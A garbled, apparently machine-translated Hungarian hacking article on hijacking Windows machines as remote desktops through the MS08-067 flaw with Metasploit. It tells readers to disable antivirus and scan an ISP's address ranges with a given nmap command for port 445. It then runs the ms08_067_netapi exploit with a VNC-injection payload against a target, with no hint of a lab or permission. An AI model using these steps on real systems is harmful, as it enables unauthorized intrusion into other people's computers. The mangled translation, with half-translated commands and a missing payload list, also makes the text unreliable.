Gone in 60 másodperc, a távoli bányászati ​​módszerrel Dedikov futó Windows

Úgy gondoljuk, hogy minden egyes új verziója a Windows egyre biztonságban. Még amerikai szakértők NSA hogy egy nagy kéz javítása a Windows biztonsági. De jól védi a Windows a valóság? Lássuk együtt. A gyakorlatban!

előállítására operatív

Most megmutatjuk, Dedikov távoli bányászati ​​módszerrel a Windows alatt olyan Metasploit Framework segítségével MS08-067 biztonsági rést. Valahogy kiaknázása ezt a hibát jelenleg nagyon népszerű a Közel-Keleten és Észak-Afrikában a hackerek, amint azt számos feljegyzés és viták Facebook (facebook.com/#!/group.php?gid=73074814856), annak ellenére, hogy az oldalak VKontakte szentelt az ugyanazon MSF (vk.com/club16499787), csend uralkodik. Legveszélyeztetettebbek összes rendszer Windows XP Professional SP2 és SP3 (a teljes operációs rendszerek listáját a veszélyeztetett, megtalálja a kb.cert.org/vuls/id/827267). De ha jól értem az írott, mind szoftver termékek melkomyagkih veszélybe kerülhet alkalmazásával ezt a hibát, és a mai napig.

Mi most az üzletet - letölthető a legújabb kiadása Metasploit Framework metasploit.com hivatalos honlapján (vagy keres a lemezen). Telepítése előtt tiltsa Anti-Virus a számítógépen. A Metasploit keret készlet saját hálózati port scanner, hanem keresni a hálózathoz csatlakoztatott gépek Windows, tudjuk használni egy külső szkenner nmap, amely bekerül a forgalmazási és telepített egyidejűleg a Metasploit keret. Így kezdődik a szkenner nmap, megjegyezve, a 445-ös port, hiszen ő volt az, és meg kell, hogy tovább használja a Kiszolgáló szolgáltatás biztonsági rést. És ez, valóban, mi vizsgálatot? A válasz meglehetősen egyszerű - például akkor vegye és átkutat IP-előtétek a szolgáltató, könnyen megtalálható a honlapon a bgp.he.net «Prefixes IP v4».

Ahhoz, hogy a előtagokat kapott szkenner nmap, először meg kell másolni egy fájlba - például my_isp.txt, és helyezze a fájlt a munka könyvtár nmap. Tehát ott megy, a lapolvasó start parancs a következő lesz:

nmap-T4 -A -v -PE -PS445 -PA445 -IL my_isp.txt

Típusú héj: a hasznos és egyéb meterpreter

Normál hasznos MP használható szinte az összes Windows-hasznosítja szerepel a Metasploit keret, válasszon az alábbi payload:

Röviden ismertesse a lényege minden.

A céltól függően a rendszer a kutatás azt is használható bármely ilyen rakományt. Tehát mire vár? Válassza ki a célt a listából, így nmap scan, és csatlakozik hozzá. Az egyszerűség kedvéért a kísérlet ezúttal egy egyszerű parancsértelmező, mint a hasznos információt.

MSF> felhasználása kihasználni / windows / smb / ms08_067_netapi
MSF kihasználni> set PAYLOAD windows / vncinject / bind_tcp
PAYLOAD => windows / vncinject / bind_tcp
MSF exploit (ms08_067_netapi)> set RHOST 192.168.0.3
RHOST => 192.168.0.3
MSF kihasználása (ms08_067_netapi)> kihasználni

Capture kiszolgáló

következtetés

Ha valaki csak azt akarja, hogy nyomja meg a gombot «kihasználni», hogy Metasploit azonnal adta Dedik kész, akkor azt kell mondanom - ez nem fog megtörténni: az eljárás továbbra is szükség időt és türelmet. A biztonsági rés nem új, és szoftvergyártók már hoztak intézkedéseket annak lokalizáció.

Például, ha egy antivírus telepítve vagy beállítva, a Windows Security Center, akkor valószínű, hogy hozzáférést biztosít a 445-ös port a külső hálózat, hogy egy nem egy távoli gépen. Különösen a Kaspersky Anti-Virus változásaira reagáló rendszer fájlokat, időszerű információkat a felhasználók számára. Bár a támadás a helyi hálózat, valószínűleg az a tény, hogy a rendszer teljes veszélybe. Mindezek ellenére, még mindig elég széles területen kikísérletezésének Windows biztonságot, és Ön is hozzájárulhat, hogy ezt az ügyet. Helyrehozhatatlan hozzájárulás :).

A Microsoft annak idején még be a díjat a $ 250,000 információt, amely segít, hogy rögzítse a Teremtő ezt a férget. „De ez a távoli múltban!” - majd kifogást, és te részben igaza. De csak részben, mert a mai helyzet nem sokat változott.

Itt található az ezt a cikket egy ismerősének: